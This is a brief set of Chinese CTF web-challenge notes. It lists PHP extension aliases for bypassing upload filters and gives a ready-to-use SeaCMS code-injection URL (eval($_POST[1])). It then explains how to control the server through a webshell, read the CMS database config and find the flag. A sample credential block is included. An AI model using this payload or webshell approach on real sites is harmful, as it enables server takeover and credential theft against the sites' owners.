CTF-Web零碎知识整理

• php别名：
  php2, php3, php4, php5, phps, pht, phtm, phtm
• cms漏洞：
  url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1；
  查看目录，一般在data/common.inc.php中含有数据库信息，编辑，执行操作，寻找flag。

data编辑：
<T>MYSQL</T>    <!--数据库类型-->
<H>localhost</H>    <!--主机名-->
<U>sea_user</U>    <!--用户名-->
<P>46e06533407e</P>    <!--密码-->
<N>seacms</N>    <!--数据库名-->

• 网站路径猜测

/var/www/html